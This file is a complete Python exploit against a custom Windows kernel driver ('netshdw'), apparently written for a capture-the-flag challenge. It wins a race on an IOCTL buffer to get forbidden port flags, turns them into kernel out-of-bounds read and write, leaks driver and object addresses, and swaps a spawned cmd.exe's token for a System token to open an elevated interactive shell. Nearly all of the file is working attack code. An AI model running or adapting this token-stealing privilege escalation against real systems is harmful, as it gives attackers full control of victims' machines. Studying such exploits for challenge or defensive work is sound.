from my_winapi import CreateFile, DeviceIoControl, CancelIoEx, SetConsoleCtrlHandler, NtQuerySystemInformation_SystemHandleInformation, NtQueryObject_ObjectTypesInformation, get_processes_and_names, OpenProcess, PROCESS_QUERY_LIMITED_INFORMATION, CloseHandle
from struct import pack, unpack_from
import ctypes
import threading
import time
import sys
import os
import subprocess

driver = CreateFile(r"\\.\netshdw")

def OpenLocalPort(portnr: int, flags: int):
    """
    flags 0~5 are allowed; 6 and 7 are banned
    if flag 2 is set, Recv is enabled
    if flag 4 is set, Send is enabled
    if flag 2 is not set, flag 4 can be set to enable receiving data without permitting Recv
      (this is used to relay messages?)
    if flag 1 or 2 is set, a sync message will be sent and a remote port will be created
    """
    DeviceIoControl(driver, 0x12a001, out=pack("<QI", portnr, flags))

def CloseLocalPort(portnr: int):
    """
    if flag 1 or 2 is set, a sync message will be sent to deregister this peer
    if flag 2 is set, every Recv IRP will be cancelled (0xc0000120) and receive blocks will be freed and removed
    if flag 2 is not set, but flag 4 is set, receive blocks will be freed and removed
    """
    DeviceIoControl(driver, 0x12a005, out=pack("<Q", portnr))

def Send(payload: bytes):
    """
    payload should be formatted as [srcport:8] [dstport:8] [flags:4] [size-0x18:2] [payload:3+]
    srcport needs flag 0x4 set
    final two bytes are just ignored

    if flag 2 is set (e.g. == 2), we will append the message onto the send queue of srcport (note that this is the same object as the recv queue)
    else if flag 2 is unset:
        if flag 4 is set (e.g. == 4), append the message onto the send queue of srcport, and then send out any delayed messages to that destination
        if flag 4 is unset (e.g. == 0), directly send the message, bypassing the send queue
    """
    DeviceIoControl(driver, 0x12a009, out=payload)

def Recv(portnr: int, flags: int, size: int):
    """
    9 <= size < 0x1009
    port needs flag 0x2 set
    """
    outbytes = bytearray(size)
    return DeviceIoControl(driver, 0x12600e, inbuf=pack("<QI", portnr, flags), out=outbytes)

def CancelDriverIO():
    CancelIoEx(driver)

class SimpleTimers:
    """ Dumb, simple timers """
    def __init__(self, interval=0.1):
        self.interval = interval
        self._lock = threading.RLock()
        self._timers = {} # {id: (due, fn)}
        self._thread = threading.Thread(target=self._timer_thread, daemon=True)
        self._thread.start()
        self._next_id = 1

    def _check_timers(self):
        now = time.time()
        while 1:
            with self._lock:
                for i, (due, tfn) in self._timers.items():
                    if now >= due:
                        del self._timers[i]
                        break
                else:
                    return

            tfn()

    def _timer_thread(self):
        while 1:
            time.sleep(self.interval)
            self._check_timers()

    def add_timer(self, due, tfn):
        with self._lock:
            res = self._next_id
            self._timers[self._next_id] = (due, tfn)
            self._next_id += 1
            return res

    def remove_timer(self, tid):
        with self._lock:
            self._timers.pop(tid, None)

timers = SimpleTimers()

def TimeoutRecv(portnr: int, flags: int, size: int, timeout: float):
    tid = timers.add_timer(time.time() + timeout, CancelDriverIO)
    try:
        return Recv(portnr, flags, size)
    finally:
        timers.remove_timer(tid)

def make_send_buf(srcport, dstport, flags, data):
    return pack("<QQIH", srcport, dstport, flags, len(data)) + data + b"xx"

## To handle Ctrl+C gracefully
def ctrl_c_handler(*args):
    # this is executed in a new thread
    try:
        CancelDriverIO()
        # successful cancellation => block other handlers
        return 1
    except Exception:
        # no active I/O => call other handlers
        return 0

# can't use signal.signal as that waits to run code in the main thread
SetConsoleCtrlHandler(ctrl_c_handler, add=True)

def get_handles():
    objtypes = NtQueryObject_ObjectTypesInformation()

    types_by_id = {}
    handles_by_type = {}
    for t in objtypes:
        types_by_id[t.TypeIndex] = t.TypeName
        handles_by_type[t.TypeName] = []

    handles = NtQuerySystemInformation_SystemHandleInformation()
    for h in handles:
        handles_by_type[types_by_id[h.ObjectTypeIndex]].append(h)

    return handles_by_type

#-------------------------------------------------------------
print("starting exploit")

ports = {}
for i in range(6):
    ports[i] = 0xdeadbeef0 + i
    OpenLocalPort(ports[i], i)

# Example Send: Send(make_send_buf(0xdeadbeef4, 0xdeadbeef3, 0, b"a"))
# Example Recv: print(Recv(0xdeadbeef3, 0, 9))

# The bug is a classic race condition. Because the ioctl uses the output buffer, rather than the input buffer,
# it is possible to change the value of the flag while the driver is still in the middle of creation.

def create_hacked_port(port, flags):
    if (flags & 2) == 0:
        # no point in doing fancy hack stuff...
        return OpenLocalPort(port, flags)

    print(f"creating hacked port {port:#x} with flags {flags}")
    buf = ctypes.create_string_buffer(pack("<QI", port, flags), 0xc)
    do_hammer = True
    def hammer_thread():
        # this is a bit of a hard race to win in Python, but it is doable
        # (due to the GIL, this thread needs to wait until the DeviceIoControl
        # call has started to even resume execution)
        nonlocal do_hammer, flags
        oflags = flags & ~2
        while do_hammer:
            buf[8] = oflags
            buf[8] = flags

    threading.Thread(target=hammer_thread, daemon=True).start()

    while 1:
        try:
            DeviceIoControl(driver, 0x12a001, out=buf)
            TimeoutRecv(port, 0, 9, 2)
        except Exception as e:
            print(e.winerror, end=" ")
            sys.stdout.flush()
            if e.winerror == 0x3e3:
                # ERROR_OPERATION_ABORTED - timeout
                break
            elif e.winerror == 87:
                # ERROR_INVALID_PARAMETER - port doesn't support Recv
                continue

            try:
                CloseLocalPort(port)
            except Exception as e:
                pass

    print()
    print("got flags=7!")
    do_hammer = False

def read_rel(port, offset, length):
    """ Read length bytes at an offset of `offset` from the start of the port structure.

    port must have flag bits 2 and 4 set. """
    assert 1 <= length <= 0xffc

    offset -= 0x5c # offset to start of buffer
    assert 0 <= offset < (1<<32)

    # Create delayed-send message for fake destination
    Send(make_send_buf(port, 0xb0ba0, 2, pack("<I", offset) + b"\xaa" * length))
    # Send a real message to the hacked port to make the received length nonzero
    Send(make_send_buf(0xdeadbeef4, port, 0, b"a"))

    result = Recv(port, 0, length + 8 + 4)
    # Clear receive queue - this is a separate message
    Recv(port, 0, 9)
    return result[8:-4]

def write_rel(port, offset, data):
    """ Write data bytes at an offset of `offset` from the start of the port structure.

    port must have flag bits 2 and 4 set. """
    assert 1 <= len(data) <= 0xffb

    offset -= 0x5c + 5 # offset to start of buffer, +5 to account for length of first chunk
    assert 0 <= offset < (1<<32)

    # Create delayed-send message to "append" to
    Send(make_send_buf(port, 0xdeadbeef4, 2, pack("<I", offset) + b"a"))
    # Send a "second" message from the same port, which will be appended to the existing queued message and written OOB
    Send(make_send_buf(0xdeadbeef4, port, 0, data))

    # Clear receive queue
    Recv(port, 0, len(data) + 8 + 5)

port = 0xdeadbeef7
create_hacked_port(port, 7)
# Read IO_CSQ structure
leak = read_rel(port, 0x1060, 0x60)
driver_base = unpack_from("<Q", leak, 0x8)[0] - 0x20c0
print("got driver base", hex(driver_base))
# No active IRPs, so the linked list pointers will point back to the object
port_addr = unpack_from("<Q", leak, 0x50)[0] - 0x10b0
print(f"got port {i} at", hex(port_addr))

# reset csq counts
write_rel(port, 0x10a8, b"\1\0\0\0")

handles = get_handles()

my_pid = os.getpid()
def get_address_of_pid(pid):
    h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    try:
        for handle in get_handles()["Process"]:
            if handle.UniqueProcessId == my_pid and handle.HandleValue == h:
                return handle.Object
    finally:
        CloseHandle(h)

def exec_cmd(args):
    proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    addr = get_address_of_pid(proc.pid)
    if addr is None:
        print("none??")
        proc.kill()
        return None
    print(proc.pid, hex(addr))
    return (proc, addr)

while 1:
    proc, addr = exec_cmd(["cmd.exe"])
    if port_addr < addr < port_addr + (1 << 32):
        break

print("GOT IT!")
# make a guess for the System token
tokh = handles["Token"][1]
# _EPROCESS::Token is an `_EX_FAST_REF` pointer, so add 5 here for the RefCnt field
write_rel(port, addr - port_addr + 0x358, pack("<Q", tokh.Object + 5))

def s2p(p: subprocess.Popen):
    while True:
        data = sys.stdin.buffer.read(1)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()
        elif len(data) == 0:
            break

def p2s(p: subprocess.Popen):
    while True:
        if p.poll() is not None:
            break
        
        sys.stdout.buffer.write(p.stdout.read(1))
        sys.stdout.buffer.flush()

def interact(p):
    threading.Thread(target=p2s, args=(p,), daemon=True).start()
    s2p(p)

interact(proc)
